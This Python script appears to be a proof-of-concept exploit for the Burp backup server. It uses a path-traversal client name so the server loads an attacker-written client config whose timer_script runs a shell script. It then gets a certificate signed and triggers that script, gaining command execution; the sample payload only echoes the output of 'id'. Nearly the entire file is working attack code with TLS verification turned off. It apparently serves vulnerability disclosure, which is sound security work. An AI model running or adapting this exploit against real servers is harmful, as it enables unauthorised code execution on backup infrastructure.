#!/usr/bin/python3.6
#
# Copyright (c) 2018, Michael Hanselmann
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#   * Redistributions of source code must retain the above copyright
#     notice, this list of conditions and the following disclaimer.
#   * Redistributions in binary form must reproduce the above copyright
#     notice, this list of conditions and the following disclaimer in the
#     documentation and/or other materials provided with the distribution.
#   * Neither the name of the <organization> nor the
#     names of its contributors may be used to endorse or promote products
#     derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

import ssl
import tempfile
import time
import io
import os
import gzip
import subprocess
import socket
import sys


CMD_GEN = b'c'
CMD_APPEND = b'a'
CMD_END_FILE = b'x'

SERVER = "localhost"
PORT = 4971


class BurpClient:
  def __init__(self, hostname, port, client_cert_file, client_key_file):
    self._ctx = ssl.create_default_context()

    # Proof-of-concept code accepts everything
    self._ctx.check_hostname = False
    self._ctx.verify_mode = ssl.CERT_NONE

    if client_cert_file or client_key_file:
      self._ctx.load_cert_chain(client_cert_file, client_key_file)

    self._sock = self._ctx.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
    self._sock.connect((hostname, port))

  def close(self):
    self._sock.close()

  def write_cmd(self, cmd, buf):
    print("Send command {!r} with {!r}".format(cmd, buf))
    assert len(cmd) == 1
    self._sock.send(cmd)
    self._sock.send("{:04x}".format(len(buf)).encode("ASCII"))
    self._sock.send(buf)

  def read_cmd(self):
    resp_cmd = self._sock.recv(1)
    resp_len_raw = self._sock.recv(4).decode("ASCII")
    resp_len = int(resp_len_raw, 16)
    resp_buf = self._sock.recv(resp_len)

    print("Received command {!r} with {!r}".format(resp_cmd, resp_buf))

    return (resp_cmd, resp_buf)

  def roundtrip_cmd(self, cmd, buf):
    self.write_cmd(cmd, buf)

    return self.read_cmd()

  def send_file(self, content):
    print("Send file with length {}".format(len(content)))

    buf = io.BytesIO()

    with gzip.GzipFile(fileobj=buf, mode="w") as f:
      f.write(content)

    self.write_cmd(CMD_APPEND, buf.getvalue())
    self.write_cmd(CMD_END_FILE, "{}:".format(len(content)).encode("ASCII"))

  def recv_file(self):
    print("Receive file")

    gzbuf = io.BytesIO()

    while True:
      (cmd, buf) = self.read_cmd()

      if cmd == CMD_APPEND:
        gzbuf.write(buf)
      elif cmd == CMD_END_FILE:
        break
      else:
        raise Exception("Unknown command {!r}".format(cmd))

    gzbuf.seek(0, 0)

    with gzip.GzipFile(fileobj=gzbuf, mode="rb") as f:
      return f.read()


with tempfile.NamedTemporaryFile(dir="/tmp", encoding="UTF-8", mode="wt") as tmpconfig, \
     tempfile.TemporaryDirectory() as tmpdir:
  keyfile = os.path.join(tmpdir, "key")
  certfile = os.path.join(tmpdir, "cert")
  cafile = os.path.join(tmpdir, "ca")
  scriptfile = os.path.join(tmpdir, "script")

  # Must not start with "." to evade "looks_like_tmp_or_hidden_file" function
  relconfig = "/../../../../../../../../../..{}".format(tmpconfig.name)

  tmpconfig.write("mode = client\n")
  tmpconfig.write("cname = {}\n".format(os.path.basename(tmpconfig.name)))
  tmpconfig.write("password = LetMeIn\n")
  tmpconfig.write("timer_script = {}\n".format(scriptfile))
  tmpconfig.flush()

  with open(scriptfile, "wt") as script:
    script.write("#!/bin/sh\n")
    script.write("echo \"Hello World, I am $(id)\"\n")
    script.flush()

  os.chmod(tmpdir, 0o755)
  os.chmod(scriptfile, 0o755)

  # Generate key
  subprocess.check_call(["openssl", "genrsa", "-out", keyfile, "2048"])

  # Generate certificate request
  csr = subprocess.check_output([
    "openssl", "req", "-new", "-batch", "-key", keyfile,
    "-subj", r"/commonName={}".format(relconfig.replace("/", "\\/")),
    ])

  client = BurpClient(SERVER, PORT, None, None)
  client.roundtrip_cmd(CMD_GEN, b"hello:2.2.12")
  # Refer to malicious client config via relative path
  client.roundtrip_cmd(CMD_GEN, relconfig.encode("UTF-8"))
  client.roundtrip_cmd(CMD_GEN, b"LetMeIn")

  # Request CSR to be signed
  client.roundtrip_cmd(CMD_GEN, b"csr")
  client.send_file(csr)

  with open(certfile, "wb") as certfh:
    certfh.write(client.recv_file())

  with open(cafile, "wb") as cafh:
    cafh.write(client.recv_file())

  client.close()

  client = BurpClient(SERVER, PORT, certfile, keyfile)
  client.roundtrip_cmd(CMD_GEN, b"hello:2.2.12")
  client.roundtrip_cmd(CMD_GEN, relconfig.encode("UTF-8"))
  client.roundtrip_cmd(CMD_GEN, b"LetMeIn")
  client.roundtrip_cmd(CMD_GEN, b"nocsr")
  client.roundtrip_cmd(CMD_GEN, b"extra_comms_begin")
  client.roundtrip_cmd(CMD_GEN, b"extra_comms_end")

  # Trigger script
  client.roundtrip_cmd(CMD_GEN, b"backupphase1timedcheck")

  client.close()
